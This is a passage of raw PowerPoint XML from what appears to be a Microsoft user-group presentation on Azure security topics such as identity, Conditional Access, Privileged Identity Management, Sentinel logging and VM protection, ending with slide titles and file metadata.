            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="7330215" y="3099230"/>
              <a:ext cx="1624111" cy="448080"/>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662FA4A8-0AD7-4BEF-A3BF-EB5D9F6BA38B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7197437" y="4463840"/>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3" name="Elbow Connector 376">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39163911-DAA2-485A-B689-18AD141069FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="38" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="6552684" y="5117101"/>
              <a:ext cx="577628" cy="1186254"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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Elbow Connector 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561BB320-0D2F-4416-90EB-EBD80186436D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="29" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7217408" y="4478910"/>
              <a:ext cx="1531956" cy="356853"/>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Elbow Connector 337">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{550BB062-2BB0-4C6D-A317-F4A695CDAF54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2866417" y="4324977"/>
              <a:ext cx="1317062" cy="876078"/>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9A666926-4325-47BF-A4AC-8458E18432EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4173742" y="4283697"/>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9" name="Elbow Connector 354">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41069696-F4B6-4B49-8FB4-BE30A3EDFF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="50" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3184095" y="1959009"/>
              <a:ext cx="1564164" cy="572884"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val 49786"/>
                <a:gd name="adj2" fmla="val 131869"/>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BCB43317-7203-47A7-AA08-B2289E856287}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4741563" y="2492870"/>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 name="Picture 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48BE5AD9-933A-4B7F-8E7A-33FA4D0FE96A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5149175" y="2950231"/>
              <a:ext cx="1264596" cy="1067102"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37C63211-6735-4740-93C1-9CEC40C051A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105527" y="6004501"/>
            <a:ext cx="6097712" cy="9079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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Juni 2022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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Identity in hybrid </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1"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nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>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1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2" name="TextBox 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01DD0A38-9226-466A-A33B-4A127345FD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575262" y="5048644"/>
            <a:ext cx="3543425" cy="9079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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sep</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 2022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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SIEM &amp; SOAR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1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6" name="TextBox 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF458A7-1EF1-4504-8F1B-CF70992A1EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407211" y="3105591"/>
            <a:ext cx="6097712" cy="9079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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Oct</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 2022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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>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1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7" name="TextBox 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68887615-525A-43A5-A697-0AE9A569F68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169494" y="986980"/>
            <a:ext cx="6097712" cy="9079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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Dec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 2022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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00206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1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8" name="TextBox 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{355526F4-552C-462A-813B-5CCDDE4AD0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8085702" y="533009"/>
            <a:ext cx="2158215" cy="9079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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Jan 2023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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Container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1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59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4317C9D0-18DD-4950-80B1-65760251C176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10005948" y="2409693"/>
            <a:ext cx="2158215" cy="9079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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mar 2023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sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>EDR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b-NO" sz="11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803902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0BACD-D837-49FA-A611-224B1A283181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Menti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA28F45F-2331-4174-A3DE-81CA70F1C53C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>menti.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (7168106)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2648070895"/>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1_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potx" id="{768097CB-AD39-43B1-A0C9-BDEB2D0BB0AE}" vid="{408056D8-DF55-4203-A651-0BE640DC0584}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Custom Design">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potx" id="{768097CB-AD39-43B1-A0C9-BDEB2D0BB0AE}" vid="{3730D0B0-C2B5-48BC-89F8-11B30864A37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fae8262-b78e-4366-8929-a5d6aac95320}" enabled="1" method="Standard" siteId="{cf36141c-ddd7-45a7-b073-111f66d0b30c}" contentBits="0" removed="0"/>
</clbl:labelList>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>TM03457491[[fn=Metropolitan]]</Template>
  <TotalTime>1114</TotalTime>
  <Words>5523</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>935</Paragraphs>
  <Slides>66</Slides>
  <Notes>32</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66</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="81" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial,Sans-Serif</vt:lpstr>
      <vt:lpstr>BreveText</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Metropolitan</vt:lpstr>
      <vt:lpstr>1_Metropolitan</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Who, why and how?​</vt:lpstr>
      <vt:lpstr>Who we are and what we do</vt:lpstr>
      <vt:lpstr>Why</vt:lpstr>
      <vt:lpstr>Microsoft Security, where to start? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Menti </vt:lpstr>
      <vt:lpstr>Thank you!</vt:lpstr>
      <vt:lpstr>Securing Identity in Azure native world</vt:lpstr>
      <vt:lpstr>Who are we ?</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Protecting your Identity</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Conditional Access</vt:lpstr>
      <vt:lpstr>What is Conditional Access ?</vt:lpstr>
      <vt:lpstr>Why use Conditional Access? </vt:lpstr>
      <vt:lpstr>Four rules you should absolutely have when enabling Conditional Access </vt:lpstr>
      <vt:lpstr>Privileged Identity Management</vt:lpstr>
      <vt:lpstr>Privileged Identity Management  What is PIM?</vt:lpstr>
      <vt:lpstr>Privileged Identity Management Common issues  - Role confusion</vt:lpstr>
      <vt:lpstr>Privileged Identity Management Decrypting roles</vt:lpstr>
      <vt:lpstr>Privileged Identity Management Differences between Azure resource roles and Azure AD roles</vt:lpstr>
      <vt:lpstr>Privileged Identity Management Four recommendations when using PIM </vt:lpstr>
      <vt:lpstr>Privileged Identity Management Four recommendations when using PIM </vt:lpstr>
      <vt:lpstr>Access Policy vs RBAC</vt:lpstr>
      <vt:lpstr>Role Based Access Control (RBAC)  Lessons learned with KeyVault (Access Policies vs RBAC) </vt:lpstr>
      <vt:lpstr>Role Based Access Control (RBAC)  Lessons learned with KeyVault (Access Policies vs RBAC) </vt:lpstr>
      <vt:lpstr>Role Based Access Control (RBAC)  Lessons learned with KeyVault (Access Policies vs RBAC) </vt:lpstr>
      <vt:lpstr>Questions ?</vt:lpstr>
      <vt:lpstr>Break  10-15 min</vt:lpstr>
      <vt:lpstr>Marius</vt:lpstr>
      <vt:lpstr>Securing Virtual Machine Workloads in Azure  PPT here   https://github.com/msugn/events</vt:lpstr>
      <vt:lpstr>Who am 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Logs and log sources</vt:lpstr>
      <vt:lpstr>Logs and log sources</vt:lpstr>
      <vt:lpstr>Logging and Monitorering in Azure</vt:lpstr>
      <vt:lpstr>How to see the full picture?</vt:lpstr>
      <vt:lpstr>Log Analytics and Sentinel</vt:lpstr>
      <vt:lpstr>Example Query</vt:lpstr>
      <vt:lpstr>Azure Backup</vt:lpstr>
      <vt:lpstr>Update Management</vt:lpstr>
      <vt:lpstr>AutoManage</vt:lpstr>
      <vt:lpstr>Defender for Cloud and Servers</vt:lpstr>
      <vt:lpstr>Azure Policy – Guest Configuration</vt:lpstr>
      <vt:lpstr>Network and traffic flow</vt:lpstr>
      <vt:lpstr>Azure NSG Flow Logs</vt:lpstr>
      <vt:lpstr>Who did changes to the VM?!</vt:lpstr>
      <vt:lpstr>Access to the virtual machines?</vt:lpstr>
      <vt:lpstr>Cool, so what does it cost?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Haflidi Fridthjofsson</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-07T07:41:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-20T12:47:16Z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fae8262-b78e-4366-8929-a5d6aac95320_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_SetDate">
    <vt:lpwstr>2022-04-07T07:41:48Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_Name">
    <vt:lpwstr>5fae8262-b78e-4366-8929-a5d6aac95320</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_SiteId">
    <vt:lpwstr>cf36141c-ddd7-45a7-b073-111f66d0b30c</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_ActionId">
    <vt:lpwstr>b07fe6d3-c086-4302-9e90-98d9d941df34</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>